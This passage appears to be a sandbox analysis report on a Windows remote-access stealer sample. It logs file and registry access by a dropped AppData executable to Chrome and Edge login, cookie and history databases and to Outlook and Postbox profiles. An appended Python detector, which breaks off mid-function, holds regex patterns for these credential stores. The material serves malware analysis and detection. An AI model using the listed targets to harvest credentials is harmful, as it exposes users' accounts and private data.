                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (3 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (7 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (3 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (4 entries)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Users\user\AppData\Roaming\zDAKFK.exe
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Users\user\AppData\Roaming\zDAKFK.exe
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.19.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7556, type: MEMORYSTR

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 6992, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: zDAKFK.exe PID: 7556, type: MEMORYSTR
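The file and registry accesses above are the stealer's credential-harvesting footprint: a binary dropped into AppData\Roaming opens the Chromium profile databases (History, Cookies, Login Data, Web Data, Top Sites) of Chrome and Edge, the Postbox profile directory and the Outlook profile key. The following script is an added example, not part of the Joe Sandbox report, showing how that pattern can be turned into a host-side detection over (process, target) access records. The record layout, the expected-reader allowlist and the sample events (built from the entries above plus two constructed benign records) are assumptions, not a real sensor schema.

```python
"""Flag processes that open browser or mail-client credential stores.

Added example, not part of the Joe Sandbox report. The (process, target)
tuple layout is an assumed log schema; SAMPLE_EVENTS is constructed from the
report's "File opened" / "Key opened" entries plus two benign records.
"""
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Chromium-profile databases the report shows being opened, under
# "<Chrome|Edge>\User Data\<profile>\".
BROWSER_STORE_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\"
    r"(Login Data|Web Data|History|Top Sites|Network\\Cookies)$",
    re.IGNORECASE,
)
# Mail-client profile locations the report shows: the Outlook profile registry
# subtree and the Postbox profiles directory.
MAIL_STORE_RE = re.compile(
    r"\\(Windows Messaging Subsystem\\Profiles|PostboxApp\\Profiles)\\",
    re.IGNORECASE,
)
# Image names expected to read their own stores (assumed allowlist; tune per site).
EXPECTED_READERS = {"chrome.exe", "msedge.exe", "outlook.exe", "postbox.exe"}
# User-writable drop locations; the report's reader lives in AppData\Roaming.
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Roaming|Local\\Temp)\\", re.IGNORECASE)


@dataclass
class Alert:
    process: str
    target: str
    reasons: List[str] = field(default_factory=list)


def classify_access(process: str, target: str) -> Optional[Alert]:
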